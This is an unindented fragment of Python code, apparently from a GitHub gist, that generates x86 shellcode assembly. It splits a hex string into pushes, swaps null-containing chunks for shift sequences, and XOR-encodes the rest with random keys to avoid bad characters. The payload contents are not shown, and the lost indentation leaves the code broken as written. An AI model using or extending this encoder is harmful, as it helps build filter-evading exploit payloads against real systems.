stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if skip is 1:
stack = '00' + stack
if len(stack) % 8 == 0:
skip = 0
if len(stack) % 8 == 0:
zxzxzxz = 0
m = len(stack) / 8
c = 0
n = 0
z = 8
shf = open('shellcode.asm','w')
shf.write(p1)
shf.close()
shf = open('shellcode.asm','a')
while(c<m):
v = 'push 0x' + stack[n:z]
skip = 0
if '0x000000' in v:
skip = 1
q1 = v[13:]
v = 'push 0x' + q1 + '414141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n'
if '0x0000' in v:
skip = 1
q1 = v[11:]
v = 'push 0x' + q1 + '4141' + '\n' + 'pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n'
if '0x00' in v:
skip = 1
q1 = v[9:]
v = 'push 0x' + q1 + '41' + '\n' + 'pop eax\nshr eax,0x08\npush eax\n'
if skip is 1:
shf.write(v)
if skip is 0:
v = v.rsplit()
zzz = ''
for w in v:
if '0x' in w:
zzz = str(w)
s1 = binascii.b2a_hex(''.join(random.choice(chars) for i in range(4)))
s1 = '0x%s'%s1
data = "%x" % (int(zzz, 16) ^ int(s1, 16))
v = 'mov eax,0x%s\nmov ebx,%s\nxor eax,ebx\npush eax\n'%(data,s1)
shf.write(v)
n += 8
z += 8
c += 1
shf.write(p2)
shf.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment